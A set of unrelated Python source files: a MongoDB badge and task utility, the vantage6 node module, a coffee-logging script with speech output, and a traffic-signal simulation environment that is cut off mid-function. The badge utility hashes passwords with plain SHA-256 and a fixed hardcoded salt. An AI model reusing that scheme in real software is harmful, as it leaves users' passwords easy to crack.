with open(HOMEDIR + filename, 'wb') as f:
for chunk in response.iter_content(1024):
f.write(chunk)
returnObj = filename;
print("Badge baked!")
else:
print("Something went wrong...")
print(response.status_code)
print(response.text)
def check_for_task(db, badgename, username, appname):
return db.tasks.find_one({"user": username, "badge": badgename, "app": appname})
def find_task_by_id(db, id):
entry = {'_id': ObjectId(id)}
return db.tasks.find_one(entry)
def increment_task_by_id(db, id, field):
entry = {'_id': ObjectId(id)}
db.tasks.update_one(entry, {'$inc': {field: 1}})
def update_task_by_id(db, id, field, score):
entry = {'_id': ObjectId(id)}
db.tasks.update_one(entry, {'$set': {field: score}})
def remove_task_by_id(db, id):
entry = {'_id': ObjectId(id)}
db.tasks.delete_one(entry)
def get_users_tasks(db, username):
return db.tasks.find({"user": username})
def get_users_tasks_for_app(db, username, appname):
return db.tasks.find({"user": username, "app": appname})
def get_users_by_badge(db, badgename):
search = list(db.users.find({"badges.name" : badgename },projection = {"name" : 1, "email" : 1, "_id" : 0}))
search = bson.json_util.dumps(search)
return search
def returnable(dbFind):
returning = list(dbFind)
returning = bson.json_util.dumps(returning)
return returning
def check_task_datetime(db, task):
'''checks the task's due date - returns true if time is up!'''
now = datetime.datetime.now()
if(task['duedate'] < now):
return True
else:
return False
## badge bake utility
def sanitize(username):
username = username.replace('.', '-dot-')
username = username.replace('@', '-at-')
return username
def create_recipient(email):
data = {"identity": shaHash(email, "deadsea"), "type": "email", "hashed": "true", "salt": "deadsea"}
return data
def get_badges(db):
return db.badges.find()
def find_badge(db, badgename):
entry = {"name": badgename}
return db.badges.find_one(entry)
def establish_criteria(badgename, criteria):
"""establishses a criteria file at /criteria/badgename.html to satisfy OpenBadges Requirements
returns a link for use in the badge"""
badgename = badgename.replace(" ", "-")
criteria_file = open(HOMEDIR + "criteria/" + badgename + ".html", 'w')
criteria_file.write(criteria)
criteria_file.close()
return HOSTIP + "criteria/" + badgename + ".html"
def get_db(dbname):
client = MongoClient('localhost:27017')
db = getattr(client, dbname)
return db
def add_person(db, personObj):
entry = personObj
db.users.insert_one(entry.output())
def get_person(db, email):
entry = {"email": email}
return db.users.find_one(entry)
def get_user_hashword(db, email):
targetperson = get_person(db, email)
return targetperson['hashword']
def get_users(db):
return db.users.find()
def find_person(db):
'''finds a person - underlying assumption is that user emails will be unique...'''
email = input("Please enter an email: ")
print(get_person(db, email))
def shaHash(email, salt):
target = (email + salt).encode('UTF-8')
return 'sha256$' + hashlib.sha256(target).hexdigest()
def add_person_request(db):
newEmail = input("please enter an email: ")
newName = input("please enter a name: ")
newHashword = input("please enter a password: ")
newHashword = shaHash(newHashword, "deadsea")
personObj = PCRUser(newEmail, newName, newHashword)
add_person(db, personObj.output())
def menu(db):
''' used to test functions without using the main server file. deprecated, but has its uses'''
command = input("Please choose an option (A)dd, (F)ind, (B)adge Utilities, (Q)uit: ")
if(command == "A" or command == 'a'):
add_person_request(db)
return True
elif(command == "B" or command == "b"):
email = input("Enter the user's email: ")
get_users_badges(db, email)
elif(command == "F" or command == "f"):
find_person(db)
return True
elif(command == "Q" or command == "q"):
return False
else:
print("Invalid command!")
return True
def get_users_badges(db, email):
'''obtains badge info from a user's profile - returns an array of arrays'''
entry = {"email": email}
badges = db.users.find_one(entry, {"badges":1}) # this is a 'mask' for the return
try:
return badges['badges']
except KeyError:
badges = []
return badges
def get_users_apps(db, email):
'''obtains app info from a user's profile - returns an array of arrays'''
entry = {"email": email}
apps = db.users.find_one(entry, {"apps":1}) # this is a 'mask' for the return
try:
return apps['apps'] ## this is an array of app names
except KeyError:
apps = []
return apps
def get_app(db, appname):
'''obtains an app from the list'''
entry = {"name": appname}
return db.apps.find_one(entry)
def get_all_apps(db):
'''returns a list of all app names in the database'''
apps = db.apps.find()
applist = []
for app in apps:
applist.append(app['name'])
return applist
def add_issuer(db, issuerObject):
'''adds an issuer to the library of issuers'''
entry = issuerObject
db.issuers.insert_one(entry.output())
def get_issuers(db):
issuers = db.issuers.find()
issuerList = []
for issuer in issuers:
issuerList.append(issuer['name'])
return issuerList
def find_issuer(db, issuername):
entry = {"name": issuername}
return db.issuers.find_one(entry)
def main():
'''deprecated now that the site seems to work, but useful if testing utilities'''
db = get_db("pcrhero")
menuFlag = True
while(menuFlag):
menuFlag = menu(db)
badges = (get_users_badges(db, 'beepboop@gmail.com'))
for badge in badges:
print(badge)
print('\n')
for person in (db.users.find()):
print(person)
print(get_issuers(db))
if __name__ == "__main__":
main()
|
__init__.py
|
""" Node
A node in its simplest would retrieve a task from the central server by
an API call, run this task and finally return the results to the central
server again.
The node application is seperated in 4 threads:
- main thread, waits for new tasks to be added to the queue and
run the tasks
- listening thread, listens for incommin websocket messages. Which
are handled by NodeTaskNamespace.
- speaking thread, waits for results from docker to return and posts
them at the central server
- proxy server thread, provides an interface for master containers
to post tasks and retrieve results
"""
import sys
import os
import random
import time
import datetime
import logging
import queue
import shutil
import json
from pathlib import Path
from threading import Thread
from socketIO_client import SocketIO, SocketIONamespace
from gevent.pywsgi import WSGIServer
from . import globals as cs
from vantage6.node.docker_manager import DockerManager
from vantage6.node.server_io import NodeClient
from vantage6.node.proxy_server import app
from vantage6.node.util import logger_name
class NodeTaskNamespace(SocketIONamespace):
"""Class that handles incoming websocket events."""
# reference to the node objects, so a callback can edit the
# node instance.
# FIXME: why is this a *class* attribute?
node_worker_ref = None
def __init__(self, *args, **kwargs):
""" Handler for a websocket namespace.
"""
super().__init__(*args, **kwargs)
self.log = logging.getLogger(logger_name(__name__))
self.node_worker_ref = None
def set_node_worker(self, node_worker):
""" Reference Node that created this Namespace.
This way we can call methods from the nodeworking, allowing
for actions to be taken.
:param node_worker: Node object
"""
self.node_worker_ref = node_worker
def on_message(self, data):
self.log.info(data)
def on_disconnect(self):
""" Server disconnects event."""
# self.node_worker_ref.socketIO.disconnect()
self.log.info('Disconnected from the server')
def on_new_task(self, task_id):
""" New task event."""
if self.node_worker_ref:
self.node_worker_ref.get_task_and_add_to_queue(task_id)
self.log.info(f'New task has been added task_id={task_id}')
else:
self.log.critical(
'Task Master Node reference not set is socket namespace'
)
def on_container_failed(self, run_id):
"""A container in the collaboration has failed event.
TODO handle run sequence at this node. Maybe terminate all
containers with the same run_id?
"""
self.log.critical(
f"A container on a node within your collaboration part of "
f"run_id={run_id} has exited with a non-zero status_code"
)
def on_expired_token(self, msg):
self.log.warning("Your token is no longer valid... reconnecting")
self.node_worker_ref.socketIO.disconnect()
self.log.debug("Old socket connection terminated")
self.node_worker_ref.server_io.refresh_token()
self.log.debug("Token refreshed")
self.node_worker_ref.connect_to_socket()
self.log.debug("Connected to socket")
# FIXME: This won't work: you're trying to access a private method!?
# self.node_worker_ref.__sync_task_queue_with_server()
# self.log.debug("Tasks synced again with the server...")
# ------------------------------------------------------------------------------
class Node(object):
"""Node to handle incomming computation requests.
The main steps this application follows: 1) retrieve (new) tasks
from the central server, 2) kick-off docker algorithm containers
based on this task and 3) retrieve the docker results and post
them to the central server.
TODO: read allowed repositories from the config file
"""
def __init__(self, ctx):
""" Initialize a new Node instance.
Authenticates to the central server, setup encrpytion, a
websocket connection, retrieving task that were posted while
offline, preparing dataset for usage and finally setup a
local proxy server.
:param ctx: application context, see utils
"""
self.log = logging.getLogger(logger_name(__name__))
self.ctx = ctx
self.config = ctx.config
self.queue = queue.Queue()
self._using_encryption = None
# initialize Node connection to the server
self.server_io = NodeClient(
host=self.config.get('server_url'),
port=self.config.get('port'),
path=self.config.get('api_path')
)
self.log.info(f"Connecting server: {self.server_io.base_path}")
# Authenticate with the server, obtaining a JSON Web Token.
# Note that self.authenticate() blocks until it succeeds.
self.log.debug("Authenticating")
self.authenticate()
# Setup encryption
self.setup_encryption()
# Thread for proxy server for algorithm containers, so they can
# communicate with the central server.
self.log.info("Setting up proxy server")
t = Thread(target=self.__proxy_server_worker, daemon=True)
t.start()
# Create a long-lasting websocket connection.
self.log.debug("Creating websocket connection with the server")
self.connect_to_socket()
# Check if new tasks were posted while offline.
self.log.debug("Fetching tasks that were posted while offline")
self.__sync_task_queue_with_server()
# If we're in a 'regular' context, we'll copy the dataset to our data
# dir and mount it in any algorithm container that's run; bind mounts
# on a folder will work just fine.
#
# If we're running in dockerized mode we *cannot* bind mount a folder,
# because the folder is in the container and not in the host. We'll
# have to use a docker volume instead. This means:
# 1. we need to know the name of the volume so we can pass it along
# 2. need to have this volume mounted so we can copy files to it.
#
# Ad 1: We'll use a default name that can be overridden by an
# environment variable.
# Ad 2: We'll expect `ctx.data_dir` to point to the right place. This
# is OK, since ctx will be a DockerNodeContext.
#
# This also means that the volume will have to be created & mounted
# *before* this node is started, so we won't do anything with it here.
# We'll create a subfolder in the data_dir. We need this subfolder so
# we can easily mount it in the algorithm containers; the root folder
# may contain the private key, which which we don't want to share.
# We'll only do this if we're running outside docker, otherwise we
# would create '/data' on the data volume.
if not ctx.running_in_docker:
task_dir = ctx.data_dir / 'data'
os.makedirs(task_dir, exist_ok=True)
else:
task_dir = ctx.data_dir
self.log.debug("Setting up the docker manager")
self.__docker = DockerManager(
allowed_images=self.config.get("allowed_images"),
tasks_dir=task_dir,
isolated_network_name=f"{ctx.docker_network_name}-net",
node_name=ctx.name,
data_volume_name=ctx.docker_volume_name,
)
# login to the registries
self.__docker.login_to_registries(
self.ctx.config.get("docker_registries", [])
)
# If we're running in a docker container, database_uri would point
# to a path on the *host* (since it's been read from the config
# file). That's no good here. Therefore, we expect the CLI to set
# the environment variable for us. This has the added bonus that we
# can override the URI from the command line as well.
default_uri = self.config['databases']['default']
database_uri = os.environ.get('DATABASE_URI', default_uri)
if Path(database_uri).exists():
# We'll copy the file to the folder `data` in our task_dir.
self.log.info(f'Copying {database_uri} to {task_dir}')
shutil.copy(database_uri, task_dir)
# Since we've copied the database to the folder 'data' in the root
# of the volume: '/data/<database.csv>'. We'll just keep the
# basename (i.e. filename + ext).
database_uri = os.path.basename(database_uri)
# Connect to the isolated algorithm network *only* if we're running in
# a docker container.
if ctx.running_in_docker:
self.__docker.connect_to_isolated_network(
ctx.docker_container_name,
aliases=[cs.NODE_PROXY_SERVER_HOSTNAME]
)
#self.__docker.connect_to_overlay_network(
# ctx.docker_container_name,
# aliases=[cs.NODE_PROXY_SERVER_HOSTNAME]
#)
# Let's keep it safe
self.__docker.set_database_uri(database_uri)
# Thread for sending results to the server when they come available.
self.log.debug("Start thread for sending messages (results)")
t = Thread(target=self.__speaking_worker, daemon=True)
t.start()
# listen forever for incoming messages, tasks are stored in
# the queue.
self.log.debug("Starting thread for incoming messages (tasks)")
t = Thread(target=self.__listening_worker, daemon=True)
t.start()
self.log.info('Init complete')
def __proxy_server_worker(self):
""" Proxy algorithm container communcation.
A proxy for communication between algorithms and central
server.
"""
# supply the proxy server with a destination (the central server)
# we might want to not use enviroment vars
os.environ["SERVER_URL"] = self.server_io.host
os.environ["SERVER_PORT"] = self.server_io.port
os.environ["SERVER_PATH"] = self.server_io.path
if self.ctx.running_in_docker:
# cs.NODE_PROXY_SERVER_HOSTNAME points to the name of the proxy
# when running in the isolated docker network.
default_proxy_host = cs.NODE_PROXY_SERVER_HOSTNAME
else:
# If we're running non-dockerized, assume that the proxy is
# accessible from within the docker algorithm container on
# host.docker.internal.
default_proxy_host = 'host.docker.internal'
# If PROXY_SERVER_HOST was set in the environment, it overrides our
# value.
proxy_host = os.environ.get("PROXY_SERVER_HOST", default_proxy_host)
os.environ["PROXY_SERVER_HOST"] = proxy_host
proxy_port = int(os.environ.get("PROXY_SERVER_PORT", 8080))
# 'app' is defined in vantage6.node.proxy_server
# app.debug = True
app.config["SERVER_IO"] = self.server_io
for try_number in range(5):
self.log.info(
f"Starting proxyserver at '{proxy_host}:{proxy_port}'")
http_server = WSGIServer(('0.0.0.0', proxy_port), app)
try:
http_server.serve_forever()
except OSError as e:
self.log.debug(f'Error during attempt {try_number}')
self.log.debug(f'{type(e)}: {e}')
if e.errno == 48:
proxy_port = random.randint(2048, 16384)
self.log.critical(
f"Retrying with a different port: {proxy_port}")
os.environ['PROXY_SERVER_PORT'] = str(proxy_port)
else:
raise
except Exception as e:
self.log.error('Proxyserver could not be started or crashed!')
self.log.error(e)
def __sync_task_queue_with_server(self):
""" Get all unprocessed tasks from the server for this node."""
assert self.server_io.cryptor, "Encrpytion has not been setup"
# request open tasks from the server
tasks = self.server_io.get_results(state="open", include_task=True)
self.log.debug(tasks)
for task in tasks:
self.queue.put(task)
self.log.info(f"received {self.queue._qsize()} tasks")
def __start_task(self, taskresult):
"""Start a task.
Start the docker image and notify the server that the task
has been started.
:param taskresult: an empty taskresult
"""
task = taskresult['task']
self.log.info("Starting task {id} - {name}".format(**task))
# notify that we are processing this task
self.server_io.set_task_start_time(taskresult["id"])
token = self.server_io.request_token_for_container(
task["id"],
task["image"]
)
token = token["container_token"]
# create a temporary volume for each run_id
# FIXME: why is docker_temporary_volume_name() in ctx???
vol_name = self.ctx.docker_temporary_volume_name(task["run_id"])
self.__docker.create_volume(vol_name)
# For some reason, if the key 'input' consists of JSON, it is
# automatically marshalled? This causes trouble, so we'll serialize it
# again.
# FIXME: should probably find & fix the root cause?
if type(taskresult['input']) == dict:
taskresult['input'] = json.dumps(taskresult['input'])
# Run the container. This adds the created container/task to the list
# __docker.active_tasks
self.__docker.run(
result_id=taskresult["id"],
image=task["image"],
docker_input=taskresult['input'],
tmp_vol_name=vol_name,
token=token
)
def __listening_worker(self):
""" Listen for incoming (websocket) messages from the server.
Runs in a separate thread. Received events are dispatched
through the appropriate action_handler for a channel.
"""
self.log.debug("listening for incoming messages")
# FIXME: while True in combination with a wait() call that never exits
# makes joining the tread (to terminate) difficult?
while True:
# incoming messages are handled by the action_handler instance
# which is attached when the socket connection was made. wait()
# is blocks forever (if no time is specified).
self.socketIO.wait()
def __speaking_worker(self):
""" Sending messages to central server.
Routine that is in a seperate thread sending results
to the server when they come available.
TODO change to a single request, might need to reconsider
the flow
"""
self.log.debug("Waiting for results to send to the server")
while True:
results = self.__docker.get_result()
# notify all of a crashed container
if results.status_code:
self.socket_tasks.emit(
'container_failed',
self.server_io.id,
results.status_code,
results.result_id,
self.server_io.collaboration_id
)
self.log.info(
f"Sending result (id={results.result_id}) to the server!")
# FIXME: why are we retrieving the result *again*? Shouldn't we
# just store the task_id when retrieving the task the first time?
response = self.server_io.request(f"result/{results.result_id}")
task_id = response.get("task").get("id")
if not task_id:
self.log.error(
f"task_id of result (id={results.result_id}) "
f"could not be retrieved"
)
return
response = self.server_io.request(f"task/{task_id}")
initiator_id = response.get("initiator")
if not initiator_id:
self.log.error(
f"Initiator id from task (id={task_id})could not be "
f"retrieved"
)
self.server_io.patch_results(
id=results.result_id,
initiator_id=initiator_id,
result={
'result': results.data,
'log': results.logs,
'finished_at': datetime.datetime.now().isoformat(),
}
)
def authenticate(self):
""" Authenticate to the central server
Authenticate with the server using the api-key. If the
server rejects for any reason we keep trying.
"""
api_key = self.config.get("api_key")
keep_trying = True
while keep_trying:
try:
self.server_io.authenticate(api_key)
except Exception as e:
msg = 'Authentication failed. Retrying in 10 seconds!'
self.log.warning(msg)
self.log.debug(e)
time.sleep(10)
else:
# This is only executed if try-block executed without error.
keep_trying = False
# At this point, we shoud be connnected.
self.log.info(f"Node name: {self.server_io.name}")
def private_key_filename(self):
"""Get the path to the private key."""
# FIXME: Code duplication: vantage6/cli/node.py uses a lot of the same
# logic. Suggest moving this to ctx.get_private_key()
filename = self.config['encryption']["private_key"]
# filename may be set to an empty string
if not filename:
filename = 'private_key.pem'
# If we're running dockerized, the location may have been overridden
filename = os.environ.get('PRIVATE_KEY', filename)
# If ctx.get_data_file() receives an absolute path, its returned as-is
fullpath = Path(self.ctx.get_data_file(filename))
return fullpath
def setup_encryption(self):
"""Setup encryption ... or don't."""
encrypted_collaboration = self.server_io.is_encrypted_collaboration()
encrypted_node = self.config['encryption']["enabled"]
if encrypted_collaboration != encrypted_node:
# You can't force it if it just ain't right, you know?
raise Exception("Expectations on encryption don't match!?")
if encrypted_collaboration:
self.log.warn('Enabling encryption!')
private_key_file = self.private_key_filename()
self.server_io.setup_encryption(private_key_file)
else:
self.log.warn('Disabling encryption!')
self.server_io.setup_encryption(None)
def connect_to_socket(self):
""" Create long-lasting websocket connection with the server.
The connection is used to receive status updates, such as
new tasks.
"""
self.socketIO = SocketIO(
self.server_io.host,
port=self.server_io.port,
headers=self.server_io.headers,
wait_for_connection=True
)
# define() returns the instantiated action_handler
self.socket_tasks = self.socketIO.define(NodeTaskNamespace, '/tasks')
self.socket_tasks.set_node_worker(self)
# Log the outcome
if self.socketIO.connected:
msg = 'connected to host={host} on port={port}'
msg = msg.format(
host=self.server_io.host,
port=self.server_io.port
)
self.log.info(msg)
else:
msg = 'could *not* connect to {host} on port={port}'
msg = msg.format(
host=self.server_io.host,
port=self.server_io.port
)
self.log.critical(msg)
def get_task_and_add_to_queue(self, task_id):
"""Fetches (open) task with task_id from the server.
The `task_id` is delivered by the websocket-connection.
"""
# fetch (open) result for the node with the task_id
tasks = self.server_io.get_results(
include_task=True,
state='open',
task_id=task_id
)
# in the current setup, only a single result for a single node
# in a task exists.
for task in tasks:
self.queue.put(task)
def run_forever(self):
"""Forever check self.queue for incoming tasks (and execute them)."""
try:
while True:
# blocking untill a task comes available
# timeout specified, else Keyboard interupts are ignored
self.log.info("Waiting for new tasks....")
while True:
try:
task = self.queue.get(timeout=1)
# if no item is returned, the Empty exception is
# triggered, thus break statement is not reached
break
except queue.Empty:
pass
except Exception as e:
self.log.debug(e)
# if task comes available, attempt to execute it
try:
self.__start_task(task)
except Exception as e:
self.log.exception(e)
except KeyboardInterrupt:
self.log.debug("Caught a keyboard interupt, shutting down...")
self.socketIO.disconnect()
sys.exit()
# ------------------------------------------------------------------------------
def run(ctx):
""" Start the node."""
logging.getLogger("urllib3").setLevel(logging.WARNING)
logging.getLogger("requests").setLevel(logging.WARNING)
logging.getLogger("socketIO-client").setLevel(logging.WARNING)
# initialize node, connect to the server using websockets
node = Node(ctx)
# put the node to work, executing tasks that are in the que
node.run_forever()
|
__init__.py
|
import click
import datetime
import fileinput
import gspread
import multiprocessing
import os
import queue
import sqlite3
import tempfile
from oauth2client.client import GoogleCredentials
from google.cloud import texttospeech
__version__ = 'v1.0.0'
class State:
def __init__(self):
self.quit = multiprocessing.Event()
self.queue = multiprocessing.Queue()
self.ready = multiprocessing.Event()
self.ready.set()
@click.command()
@click.version_option(version=__version__)
def main():
try:
state = State()
multiprocessing.Process(target=read, args=(state,)).start()
for line in fileinput.input():
if state.quit.is_set():
break
if state.ready.is_set():
state.ready.clear()
state.queue.put(line)
state.quit.set()
except KeyboardInterrupt:
pass
except:
state.quit.set()
def create_log(name, tag):
now = datetime.datetime.now()
scope = ['https://spreadsheets.google.com/feeds', 'https://www.googleapis.com/auth/drive']
credentials = GoogleCredentials.get_application_default().create_scoped(scope)
client = gspread.authorize(credentials)
spreadsheet = client.open("CWGTK - Coffee Log")
worksheet = spreadsheet.worksheet('Log')
values = [now.strftime('%Y-%m-%d %H:%M:%S'), tag, name if name is not None else '']
if worksheet.row_count < 2:
worksheet.append_row(['Date', 'Tag', 'Name'])
worksheet.append_row(values)
else:
worksheet.insert_row(values, index=2)
def record(tag):
conn = sqlite3.connect('sql/coffeelog.db')
c = conn.cursor()
c.execute('CREATE TABLE IF NOT EXISTS records (id INTEGER PRIMARY KEY, timestamp INTEGER NOT NULL, tag TEXT NOT NULL)')
c.execute("INSERT INTO records (timestamp, tag) VALUES (datetime('now', 'localtime'), ?)", (tag,))
conn.commit()
c.execute("SELECT count(*) FROM records WHERE timestamp >= date('now', 'localtime') AND tag = ?", (tag,))
count = c.fetchone()[0]
c.execute('CREATE TABLE IF NOT EXISTS people (id INTEGER PRIMARY KEY, tag TEXT NOT NULL, name TEXT NOT NULL, phrase TEXT NOT NULL)')
conn.commit()
c.execute("SELECT name, phrase FROM people WHERE tag = ?", (tag,))
row = c.fetchone()
name = row[0] if row is not None else None
phrase = ' ' + row[1] if row is not None else ''
conn.close()
sentence = 'Dnes je to {}. káva{}.'.format(count, phrase)
say(sentence)
return name
def say(text):
client = texttospeech.TextToSpeechClient()
synthesis_input = texttospeech.types.SynthesisInput(text=text)
voice = texttospeech.types.VoiceSelectionParams(
language_code='cs-CZ',
name='cs-CZ-Wavenet-A',
ssml_gender=texttospeech.enums.SsmlVoiceGender.NEUTRAL)
audio_config = texttospeech.types.AudioConfig(
audio_encoding=texttospeech.enums.AudioEncoding.MP3)
response = client.synthesize_speech(synthesis_input, voice, audio_config)
with tempfile.NamedTemporaryFile(suffix='.mp3') as fp:
fp.write(response.audio_content)
fp.flush()
os.system('mpg123 -q {}'.format(fp.name))
def read(state):
try:
while not state.quit.is_set():
try:
tag = state.queue.get(timeout=0.1).rstrip()
except queue.Empty:
continue
os.system('aplay -q /home/pi/cwgtk/coffeelog/bell.wav')
name = record(tag)
state.ready.set()
create_log(name, tag)
except KeyboardInterrupt:
pass
except:
state.quit.set()
|
anon_env.py
|
import pickle
import numpy as np
import json
import sys
import pandas as pd
import os
from utility import get_cityflow_config
import time
import threading
from multiprocessing import Process, Pool
from script import get_traffic_volume
from copy import deepcopy
import cityflow
# engine = cdll.LoadLibrary("./engine.cpython-36m-x86_64-linux-gnu.so")
class Intersection:
DIC_PHASE_MAP = {
0: 1,
1: 2,
2: 3,
3: 4,
-1: 0
}
def __init__(self, inter_id, dic_traffic_env_conf, eng, light_id_dict):
self.inter_id = inter_id
self.inter_name = "intersection_{0}_{1}".format(inter_id[0], inter_id[1])
self.eng = eng
self.fast_compute = dic_traffic_env_conf['FAST_COMPUTE']
# ===== intersection settings =====
self.list_approachs = ["W", "E", "N", "S"]
self.dic_approach_to_node = {"W": 0, "E": 2, "S": 1, "N": 3}
self.dic_entering_approach_to_edge = {"W": "road_{0}_{1}_0".format(inter_id[0] - 1, inter_id[1])}
self.dic_entering_approach_to_edge.update({"E": "road_{0}_{1}_2".format(inter_id[0] + 1, inter_id[1])})
self.dic_entering_approach_to_edge.update({"N": "road_{0}_{1}_3".format(inter_id[0], inter_id[1] + 1)})
self.dic_entering_approach_to_edge.update({"S": "road_{0}_{1}_1".format(inter_id[0], inter_id[1] - 1)})
self.dic_exiting_approach_to_edge = {
approach: "road_{0}_{1}_{2}".format(inter_id[0], inter_id[1], self.dic_approach_to_node[approach]) for
approach in self.list_approachs}
# grid settings
self.length_lane = 300
self.length_terminal = 50
self.length_grid = 5
self.num_grid = int(self.length_lane // self.length_grid)
self.list_phases = dic_traffic_env_conf["PHASE"][dic_traffic_env_conf['SIMULATOR_TYPE']]
# generate all lanes
self.list_entering_lanes = []
for approach in self.list_approachs:
self.list_entering_lanes += [self.dic_entering_approach_to_edge[approach] + '_' + str(i) for i in
range(sum(list(dic_traffic_env_conf["LANE_NUM"].values())))]
self.list_exiting_lanes = []
for approach in self.list_approachs:
self.list_exiting_lanes += [self.dic_exiting_approach_to_edge[approach] + '_' + str(i) for i in
range(sum(list(dic_traffic_env_conf["LANE_NUM"].values())))]
self.list_lanes = self.list_entering_lanes + self.list_exiting_lanes
self.adjacency_row = light_id_dict['adjacency_row']
self.neighbor_ENWS = light_id_dict['neighbor_ENWS']
# previous & current
self.dic_lane_vehicle_previous_step = {}
self.dic_lane_waiting_vehicle_count_previous_step = {}
self.dic_vehicle_speed_previous_step = {}
self.dic_vehicle_distance_previous_step = {}
self.dic_lane_vehicle_current_step = {}
self.dic_lane_waiting_vehicle_count_current_step = {}
self.dic_vehicle_speed_current_step = {}
self.dic_vehicle_distance_current_step = {}
self.list_lane_vehicle_previous_step = []
self.list_lane_vehicle_current_step = []
# -1: all yellow, -2: all red, -3: none
self.all_yellow_phase_index = -1
self.all_red_phase_index = -2
self.current_phase_index = 1
self.previous_phase_index = 1
self.eng.set_tl_phase(self.inter_name, self.current_phase_index)
self.next_phase_to_set_index = None
self.current_phase_duration = -1
self.all_red_flag = False
self.all_yellow_flag = False
self.flicker = 0
self.dic_vehicle_min_speed = {} # this second
self.dic_vehicle_arrive_leave_time = dict() # cumulative
self.dic_feature = {} # this second
self.dic_feature_previous_step = {} # this second
# set
def set_signal(self, action, action_pattern, yellow_time, all_red_time):
if self.all_yellow_flag:
# in yellow phase
self.flicker = 0
if self.current_phase_duration >= yellow_time: # yellow time reached
self.current_phase_index = self.next_phase_to_set_index
self.eng.set_tl_phase(self.inter_name, self.current_phase_index) # if multi_phase, need more adjustment
self.all_yellow_flag = False
else:
pass
else:
# determine phase
if action_pattern == "switch": # switch by order
if action == 0: # keep the phase
self.next_phase_to_set_index = self.current_phase_index
elif action == 1: # change to the next phase
self.next_phase_to_set_index = (self.current_phase_index + 1) % len(
self.list_phases) # if multi_phase, need more adjustment
else:
sys.exit("action not recognized\n action must be 0 or 1")
elif action_pattern == "set": # set to certain phase
self.next_phase_to_set_index = self.DIC_PHASE_MAP[action] # if multi_phase, need more adjustment
# set phase
if self.current_phase_index == self.next_phase_to_set_index: # the light phase keeps unchanged
pass
else: # the light phase needs to change
# change to yellow first, and activate the counter and flag
self.eng.set_tl_phase(self.inter_name, 0)
self.current_phase_index = self.all_yellow_phase_index
self.all_yellow_flag = True
self.flicker = 1
# update inner measurements
def update_previous_measurements(self):
self.previous_phase_index = self.current_phase_index
self.dic_lane_vehicle_previous_step = self.dic_lane_vehicle_current_step
self.dic_lane_waiting_vehicle_count_previous_step = self.dic_lane_waiting_vehicle_count_current_step
self.dic_vehicle_speed_previous_step = self.dic_vehicle_speed_current_step
self.dic_vehicle_distance_previous_step = self.dic_vehicle_distance_current_step
def update_current_measurements_map(self, simulator_state, path_to_log, test_flag):
## need change, debug in seeing format
def _change_lane_vehicle_dic_to_list(dic_lane_vehicle):
list_lane_vehicle = []
for value in dic_lane_vehicle.values():
list_lane_vehicle.extend(value)
return list_lane_vehicle
if self.current_phase_index == self.previous_phase_index:
self.current_phase_duration += 1
else:
self.current_phase_duration = 1
self.dic_lane_vehicle_current_step = {}
self.dic_lane_waiting_vehicle_count_current_step = {}
for lane in self.list_entering_lanes:
self.dic_lane_vehicle_current_step[lane] = simulator_state["get_lane_vehicles"][lane]
self.dic_lane_waiting_vehicle_count_current_step[lane] = simulator_state["get_lane_waiting_vehicle_count"][
lane]
for lane in self.list_exiting_lanes:
self.dic_lane_waiting_vehicle_count_current_step[lane] = simulator_state["get_lane_waiting_vehicle_count"][
lane]
self.dic_vehicle_speed_current_step = simulator_state['get_vehicle_speed']
self.dic_vehicle_distance_current_step = simulator_state['get_vehicle_distance']
# get vehicle list
self.list_lane_vehicle_current_step = _change_lane_vehicle_dic_to_list(self.dic_lane_vehicle_current_step)
self.list_lane_vehicle_previous_step = _change_lane_vehicle_dic_to_list(self.dic_lane_vehicle_previous_step)
list_vehicle_new_arrive = list(
set(self.list_lane_vehicle_current_step) - set(self.list_lane_vehicle_previous_step))
list_vehicle_new_left = list(
set(self.list_lane_vehicle_previous_step) - set(self.list_lane_vehicle_current_step))
list_vehicle_new_left_entering_lane_by_lane = self._update_leave_entering_approach_vehicle()
list_vehicle_new_left_entering_lane = []
for l in list_vehicle_new_left_entering_lane_by_lane:
list_vehicle_new_left_entering_lane += l
# update vehicle arrive and left time
self._update_arrive_time(list_vehicle_new_arrive)
self._update_left_time(list_vehicle_new_left_entering_lane, path_to_log)
# update feature
self._update_feature_map(simulator_state, test_flag)
def update_current_measurements(self, path_to_log):
## need change, debug in seeing format
def _change_lane_vehicle_dic_to_list(dic_lane_vehicle):
list_lane_vehicle = []
for value in dic_lane_vehicle.values():
list_lane_vehicle.extend(value)
return list_lane_vehicle
if self.current_phase_index == self.previous_phase_index:
self.current_phase_duration += 1
else:
self.current_phase_duration = 1
self.dic_lane_vehicle_current_step = [] # = self.eng.get_lane_vehicles()
# not implement
flow_tmp = self.eng.get_lane_vehicles()
self.dic_lane_vehicle_current_step = {key: None for key in self.list_entering_lanes}
for lane in self.list_entering_lanes:
self.dic_lane_vehicle_current_step[lane] = flow_tmp[lane]
self.dic_lane_waiting_vehicle_count_current_step = self.eng.get_lane_waiting_vehicle_count()
self.dic_vehicle_speed_current_step = self.eng.get_vehicle_speed()
self.dic_vehicle_distance_current_step = self.eng.get_vehicle_distance()
# get vehicle list
self.list_lane_vehicle_current_step = _change_lane_vehicle_dic_to_list(self.dic_lane_vehicle_current_step)
self.list_lane_vehicle_previous_step = _change_lane_vehicle_dic_to_list(self.dic_lane_vehicle_previous_step)
list_vehicle_new_arrive = list(
set(self.list_lane_vehicle_current_step) - set(self.list_lane_vehicle_previous_step))
list_vehicle_new_left = list(
set(self.list_lane_vehicle_previous_step) - set(self.list_lane_vehicle_current_step))
list_vehicle_new_left_entering_lane_by_lane = self._update_leave_entering_approach_vehicle()
list_vehicle_new_left_entering_lane = []
for l in list_vehicle_new_left_entering_lane_by_lane:
list_vehicle_new_left_entering_lane += l
# update vehicle arrive and left time
self._update_arrive_time(list_vehicle_new_arrive)
self._update_left_time(list_vehicle_new_left_entering_lane, path_to_log)
# update feature
self._update_feature()
def _update_leave_entering_approach_vehicle(self):
list_entering_lane_vehicle_left = []
# update vehicles leaving entering lane
if not self.dic_lane_vehicle_previous_step:
for lane in self.list_entering_lanes:
list_entering_lane_vehicle_left.append([])
else:
last_step_vehicle_id_list = []
current_step_vehilce_id_list = []
for lane in self.list_entering_lanes:
last_step_vehicle_id_list.extend(self.dic_lane_vehicle_previous_step[lane])
current_step_vehilce_id_list.extend(self.dic_lane_vehicle_current_step[lane])
list_entering_lane_vehicle_left.append(
list(set(last_step_vehicle_id_list) - set(current_step_vehilce_id_list))
)
return list_entering_lane_vehicle_left
def _update_arrive_time(self, list_vehicle_arrive):
ts = self.get_current_time()
# get dic vehicle enter leave time
for vehicle in list_vehicle_arrive:
